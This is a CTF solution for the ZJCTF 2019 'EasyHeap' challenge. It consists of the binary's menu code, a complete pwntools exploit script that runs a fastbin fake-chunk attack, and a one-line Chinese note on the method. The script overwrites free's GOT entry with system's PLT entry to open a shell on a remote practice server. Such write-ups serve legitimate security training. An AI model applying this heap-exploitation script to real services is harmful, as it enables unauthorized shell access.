[ZJCTF 2019]EasyHeap
puts(“——————————–”);
puts(“ Easy Heap Creator “);
puts(“——————————–”);
puts(“ 1. Create a Heap “);
puts(“ 2. Edit a Heap “);
puts(“ 3. Delete a Heap “);
puts(“ 4. Exit “);
puts(“——————————–”);
return printf(“Your choice :”);
from pwn import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
elf = ELF("/home/rick/Downloads/easyheap/easyheap")
p = remote("node5.buuoj.cn",29263)
libc = ELF("/home/rick/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")
def debug():
attach(p)
pause()
def alloc(size,content):
p.recvuntil("Your choice :")
p.sendline('1')
p.recvuntil("Size of Heap : ")
p.sendline(str(size))
p.recvuntil("Content of heap:")
p.sendline(content)
def edit(idx, size, content):
p.recvuntil("Your choice :")
p.sendline('2')
p.recvuntil("Index :")
p.sendline(str(idx))
p.recvuntil("Size of Heap : ")
p.sendline(str(size))
p.recvuntil("Content of heap : ")
p.sendline(content)
def free(idx):
p.recvuntil("Your choice :")
p.sendline('3')
p.recvuntil("Index :")
p.sendline(str(idx))
bss_heaparray = 0x6020E0
using_fake_chunk = bss_heaparray - 0x33
alloc(0x60,b"rick")
alloc(0x60,b"rick")
alloc(0x60,b"rick") #2
free(2)
payload = b'/bin/sh\x00' +b'A'*0x60 + p64(0x71) + p64(using_fake_chunk)
edit(1,len(payload),payload)
alloc(0x60,b"rick")
alloc(0x60,b"rick") #alloc fake chunk
payload=p64(0)*4+b'A'*0x3+p64(elf.got["free"])
edit(3,len(payload),payload)
payload = p64(elf.plt["system"])
edit(0,len(payload),payload) # now modify free got
free(1)
p.interactive()通过修改bss静态段的heaparray来使idx0变成free的got表 然后写入system的plt 随后free就执行